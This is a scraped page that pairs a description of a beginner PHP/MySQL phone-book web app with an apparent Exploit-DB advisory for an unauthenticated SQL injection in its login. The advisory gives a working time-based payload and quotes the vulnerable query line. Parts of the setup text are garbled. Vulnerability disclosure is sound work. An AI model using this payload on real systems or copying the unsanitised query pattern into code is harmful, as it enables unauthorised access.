This is a PHP Mini-Project called Phone book/directory Web App. This is a simple web application for saving someone's contact number. This can be useful for a small company to serve as the employees/staffs contact directory or else. The main purpose of creating this app is to share this with you most especially for beginners and new to PHP language to have a simple PHP project to learn with. This will help you to learn how to develop a simple web application using the said programming language and MySQL Database that containing CRUD Operations/functionalities.
About the Phone book/Phone Directory Web App
PHPMyAdminin a browser. i.e.
SQLfile. The file is known as
phonebook.sqllocated inside the extracted source code folder.
That's it! I hope this Phone book/directory Web App in PHP will help you with what you are looking for.
Note: Due to the size or complexity of this submission, the author has submitted it as a .zip file to shorten your download time. After downloading it, you will need a program like Winzip to decompress it.
Virus note: All files are scanned once-a-day by SourceCodester.com for viruses, but new viruses come out every day, so no prevention program can catch 100% of them.
FOR YOUR OWN SAFETY, PLEASE:
1. Re-scan downloaded files using your personal virus checker before using it.
2. NEVER, EVER run compiled files (.exe's, .ocx's, .dll's etc.)--only run source code.
# Exploit Title: Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated) # Date: 21/08/2021 # Exploit Author: Justin White # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html # Version: 1.0 # Testeted on: Linux (Ubuntu 20.04) using LAMPP ## SQL Injection # Vulnerable page http://localhost/PhoneBook/index.php # Vulnerable paramater username1 & password # POC Username = ' or sleep(5)='-- - Password = ' ' Using these to login will have the webapp sleep for 5 seconds, then you will be logged in as "' or sleep(5)='-- -" # Vulnerable Code index.php line 13 $sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'");